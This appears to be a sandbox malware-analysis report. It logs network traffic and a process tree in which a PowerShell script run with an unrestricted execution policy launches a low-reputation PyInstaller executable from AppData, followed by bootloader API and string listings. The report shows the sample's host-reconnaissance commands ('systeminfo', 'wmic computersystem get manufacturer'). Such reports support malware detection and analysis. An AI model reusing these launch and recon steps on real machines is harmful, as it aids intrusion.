Dec 9, 2024 17:11:57.915832996 CET	443	49722	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:57.915903091 CET	49722	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:57.916809082 CET	49722	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:57.916826963 CET	443	49722	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:59.161834955 CET	443	49722	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:59.162587881 CET	49722	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:59.162609100 CET	443	49722	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:59.163690090 CET	443	49722	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:59.163758993 CET	49722	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:59.165077925 CET	49722	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:59.165205956 CET	443	49722	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:59.165234089 CET	49722	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:59.165283918 CET	49722	443	192.168.2.8	104.20.22.46

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 17:11:33.168961048 CET	53836	53	192.168.2.8	1.1.1.1
Dec 9, 2024 17:11:33.307643890 CET	53	53836	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 17:11:33.168961048 CET	192.168.2.8	1.1.1.1	0x37c8	Standard query (0)	nodejs.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 17:11:33.307643890 CET	1.1.1.1	192.168.2.8	0x37c8	No error (0)	nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:11:33.307643890 CET	1.1.1.1	192.168.2.8	0x37c8	No error (0)	nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	11:10:47
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:10:47
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:11:16
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Imagebase:	0x7ff61e8e0000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:11:22
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Imagebase:	0x7ff61e8e0000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:11:26
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Imagebase:	0x7ff61e8e0000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:11:29
Start date:	09/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff669bc0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:11:29
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7cdcc0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:11:30
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:	0x7ff637610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:11:31
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:11:31
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get manufacturer
Imagebase:	0x7ff7afb80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:11:36
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Imagebase:	0x7ff61e8e0000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:11:36
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Imagebase:	0x7ff61e8e0000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:11:37
Start date:	09/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3120 -s 968
Imagebase:	0x7ff6e8290000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:11:45
Start date:	09/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff669bc0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:11:45
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:11:46
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:	0x7ff637610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3976, Parent PID: 6636

General

Target ID:	24
Start time:	11:11:46
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:11:46
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get manufacturer
Imagebase:	0x7ff7afb80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:11:47
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Imagebase:	0x7ff61e8e0000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:11:50
Start date:	09/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7100 -s 968
Imagebase:	0x7ff6e8290000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:11:55
Start date:	09/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff669bc0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:11:55
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff779180000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:11:55
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:	0x7ff637610000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:11:55
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:11:55
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get manufacturer
Imagebase:	0x7ff7afb80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:11:58
Start date:	09/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5536 -s 1012
Imagebase:	0x7ff6e8290000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	45

Executed Functions

Function 00007FF61E8E89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61E8E9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF61E8E45F4,00000000,00007FF61E8E1985), ref: 00007FF61E8E93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8A56

Part of subcall function 00007FF61E8FA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8FA490

Part of subcall function 00007FF61E8F871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8AE6
CreateProcessW.KERNELBASE ref: 00007FF61E8E8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8B28

Part of subcall function 00007FF61E8E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2C9E
Part of subcall function 00007FF61E8E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2D63
Part of subcall function 00007FF61E8E2C50: MessageBoxW.USER32 ref: 00007FF61E8E2D99

RegisterClassW.USER32 ref: 00007FF61E8E8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8B8B
CreateWindowExW.USER32 ref: 00007FF61E8E8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8C15
PeekMessageW.USER32 ref: 00007FF61E8E8C39
TranslateMessage.USER32 ref: 00007FF61E8E8C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8C51
PeekMessageW.USER32 ref: 00007FF61E8E8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8E04
GetExitCodeProcess.KERNELBASE ref: 00007FF61E8E8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF61E8E3F7F), ref: 00007FF61E8E8E2F

Strings

Failed to create child process!, xrefs: 00007FF61E8E8B30
PyInstaller Onefile Hidden Window, xrefs: 00007FF61E8E8B95
CreateProcessW, xrefs: 00007FF61E8E8B37
PyInstallerOnefileHiddenWindow, xrefs: 00007FF61E8E8B54

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: aa5885aa83c616290d9219af21ec89d4ae7459d17a42b52ad0a2206c30934fcc
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 84D16132A18F8286EB508F35E8542AD7764FFA4F68F540635EA5EC3AA5DF3CE5448700

Function 00007FF61E8E1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF61E8E3B32
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF61E8E3E0A
Failed to load splash screen resources!, xrefs: 00007FF61E8E3E85
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF61E8E3971
_PYI_ARCHIVE_FILE, xrefs: 00007FF61E8E38D2, 00007FF61E8E39FF
VCRUNTIME140.dll, xrefs: 00007FF61E8E3DB1
Failed to convert DLL search path!, xrefs: 00007FF61E8E3DDC
Failed to remove temporary directory: %s, xrefs: 00007FF61E8E3FCF
pyi-python-flag, xrefs: 00007FF61E8E3AD6
_PYI_SPLASH_IPC, xrefs: 00007FF61E8E3A23, 00007FF61E8E3EF5
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF61E8E3BE8
MEI, xrefs: 00007FF61E8E3933
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF61E8E39DE
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF61E8E3EBB
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF61E8E3A0B, 00007FF61E8E3CD4, 00007FF61E8E3F6B
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF61E8E3EA6
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF61E8E3C61
Py_GIL_DISABLED, xrefs: 00007FF61E8E3AF4
pyi-contents-directory, xrefs: 00007FF61E8E3B8D
Could not create temporary directory!, xrefs: 00007FF61E8E3CBF
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF61E8E3D12
pkg, xrefs: 00007FF61E8E39BE
Failed to start splash screen!, xrefs: 00007FF61E8E3ED4
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF61E8E3882, 00007FF61E8E38AF
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF61E8E3A17, 00007FF61E8E3A2F, 00007FF61E8E3A9B
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF61E8E3D35
pyi-runtime-tmpdir, xrefs: 00007FF61E8E3B68
pyi-disable-windowed-traceback, xrefs: 00007FF61E8E3BB2

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 9db08009f9163a53b25ab8bbdba1475377257322832201579c571555304dfb08
Instruction ID: d6a71cb3e35e9b490fb5299cd30ab24940975e4e57f5f3e1add58e45f9e8568e
Opcode Fuzzy Hash: 9db08009f9163a53b25ab8bbdba1475377257322832201579c571555304dfb08
Instruction Fuzzy Hash: BB328221E0CE8291FB99DB26D4553B966A1AF65FA0F844432FA5DC32D6EF2CF954C300

Function 00007FF61E905C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF61E905C45

Part of subcall function 00007FF61E905598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9055AC

Part of subcall function 00007FF61E8FA948: RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
Part of subcall function 00007FF61E8FA948: GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968

Part of subcall function 00007FF61E8FA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF61E8FA8DF,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FA909
Part of subcall function 00007FF61E8FA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61E8FA8DF,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FA92E

_get_daylight.LIBCMT ref: 00007FF61E905C34

Part of subcall function 00007FF61E9055F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E90560C

_get_daylight.LIBCMT ref: 00007FF61E905EAA
_get_daylight.LIBCMT ref: 00007FF61E905EBB
_get_daylight.LIBCMT ref: 00007FF61E905ECC
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61E90610C), ref: 00007FF61E905EF3

Strings

Eastern Summer Time, xrefs: 00007FF61E905FB1
Eastern Standard Time, xrefs: 00007FF61E905F99

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: f139f3a9a61fc869887df950bf090784bf9db9fd693e2758c7f7d3b4b357a4ae
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: 6ED1C036A08A5286EB60DF22D4401B96769EFA4FB4F848936FA4DC7697DF3CF4418740

Function 00007FF61E906964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61E906698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9066D9
Part of subcall function 00007FF61E906698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E906757
Part of subcall function 00007FF61E906698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9067A8

CreateFileW.KERNELBASE ref: 00007FF61E906A6A
CreateFileW.KERNEL32 ref: 00007FF61E906ABA
GetLastError.KERNEL32 ref: 00007FF61E906AEA
GetFileType.KERNELBASE ref: 00007FF61E906AFF
GetLastError.KERNEL32 ref: 00007FF61E906B09
CloseHandle.KERNEL32 ref: 00007FF61E906B3C
CloseHandle.KERNEL32 ref: 00007FF61E906C9F
CreateFileW.KERNEL32 ref: 00007FF61E906CD4
GetLastError.KERNEL32 ref: 00007FF61E906CE3

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 497b87a93ac96d302d8da61312693ac554248a01d8a42db04bc9c811171a2109
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: C7C1B032B28E4185EB50CF69C4902AC3765EB59FA8B514635EE2ED7B96DF38E051C340

Function 00007FF61E8E83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E842B
